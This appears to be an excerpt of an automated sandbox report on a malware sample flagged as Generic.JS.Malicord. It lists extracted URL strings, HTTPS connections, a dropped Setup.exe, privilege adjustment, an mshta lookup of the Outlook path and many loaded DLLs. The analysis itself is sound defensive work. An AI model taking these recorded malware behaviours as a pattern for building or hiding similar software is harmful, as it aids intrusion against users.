Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.cox.net/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.dns.sb/dns-query
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.opendns.com/dns-query
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.quickline.ch/dns-query
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://doh.xfinity.com/dns-query
Source: powershell.exe, 00000012.00000002.2565356773.000001E0B9620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.2436690487.0000014282D5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B8992000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/161903006
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/166809097
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/184850002
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/187425444
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/220069903
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/220069903emulatePixelLocalStorageEmulate
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/229267970
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/250706693
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/253522366
Source: libGLESv2.dll.0.dr String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://myactivity.google.com/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://nextdns.io/privacy
Source: powershell.exe, 0000000F.00000002.2450786406.0000014291D55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2436690487.00000142835D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2450786406.0000014291C12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B96A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://odvr.nic.cz/doh
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: sw.pak.0.dr String found in binary or memory: https://passwords.google.comAkaunti
Source: fr.pak.0.dr String found in binary or memory: https://passwords.google.comCompte
Source: zh-CN.pak.0.dr String found in binary or memory: https://passwords.google.comGoogle
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://policies.google.com/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/IIJ
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/dns-query
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: fr.pak.0.dr String found in binary or memory: https://support.google.com/chrome/a/?p=block_warn
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr String found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: zh-CN.pak.0.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlG
Source: sw.pak.0.dr String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlInasimamiwa
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.nic.cz/odvr/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.quad9.net/home/privacy/
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File dump: Setup.exe.0.dr 162027520 Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe File dump: Setup.exe0.0.dr 162027520 Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File dump: Setup.exe.3.dr 162027520 Jump to dropped file
Enables security privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Process token adjusted: Security Jump to behavior
PE file contains more sections than normal
Source: libEGL.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: vk_swiftshader.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll0.0.dr Static PE information: Number of sections : 12 > 10
Source: vulkan-1.dll.0.dr Static PE information: Number of sections : 12 > 10
Source: Setup.exe0.0.dr Static PE information: Number of sections : 16 > 10
Source: libEGL.dll0.0.dr Static PE information: Number of sections : 12 > 10
Source: ffmpeg.dll0.0.dr Static PE information: Number of sections : 11 > 10
Source: Setup.exe.3.dr Static PE information: Number of sections : 16 > 10
Source: ffmpeg.dll.0.dr Static PE information: Number of sections : 11 > 10
Source: Setup.exe.0.dr Static PE information: Number of sections : 16 > 10
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kbdus.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mf.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfplat.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rtworkq.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msmpeg2vdec.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfperfhelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxva2.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msvproc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
